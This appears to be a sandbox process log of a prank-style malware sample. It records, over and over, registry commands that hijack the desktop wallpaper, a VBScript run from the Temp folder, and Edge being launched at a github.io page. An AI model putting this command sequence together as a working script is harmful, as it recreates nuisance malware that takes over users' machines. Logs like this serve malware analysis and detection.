reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7136 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

